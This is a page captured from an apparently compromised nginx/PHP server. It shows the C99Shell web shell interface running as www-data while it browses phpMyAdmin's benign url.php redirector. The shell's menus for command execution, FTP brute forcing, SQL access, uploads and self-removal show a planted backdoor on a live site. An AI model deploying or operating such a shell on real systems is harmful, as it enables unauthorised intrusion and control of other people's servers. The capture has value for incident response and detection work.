!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/   drwxr-xr-x
Free 83.35 GB of 96.73 GB (86.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     url.php (1.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * URL redirector to avoid leaking Referer with some sensitive information.
 */

declare(strict_types=1);

use 
PhpMyAdmin\Core;
use 
PhpMyAdmin\DatabaseInterface;
use 
PhpMyAdmin\Response;
use 
PhpMyAdmin\Sanitize;

if (! 
defined('ROOT_PATH')) {
    
// phpcs:disable PSR1.Files.SideEffects
    
define('ROOT_PATH'__DIR__ DIRECTORY_SEPARATOR);
    
// phpcs:enable
}

global 
$containerBuilder$dbi;

// phpcs:disable PSR1.Files.SideEffects
define('PMA_MINIMUM_COMMON'true);
// phpcs:enable

require_once ROOT_PATH 'libraries/common.inc.php';

// Load database service because services.php is not available here
$dbi DatabaseInterface::load();
$containerBuilder->set(DatabaseInterface::class, $dbi);

// Only output the http headers
$response Response::getInstance();
$response->getHeader()->sendHttpHeaders();
$response->disable();

if (! 
Core::isValid($_GET['url'])
    || ! 
preg_match('/^https:\/\/[^\n\r]*$/'$_GET['url'])
    || ! 
Core::isAllowedDomain($_GET['url'])
) {
    
Core::sendHeaderLocation('./');
} else {
    
// JavaScript redirection is necessary. Because if header() is used
    //  then web browser sometimes does not change the HTTP_REFERER
    //  field and so with old URL as Referer, token also goes to
    //  external site.
    
$template $containerBuilder->get('template');
    echo 
$template->render('javascript/redirect', [
        
'url' => Sanitize::escapeJsString($_GET['url']),
    ]);
    
// Display redirecting msg on screen.
    // Do not display the value of $_GET['url'] to avoid showing injected content
    
echo __('Taking you to the target site.');
}
die;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.003 ]--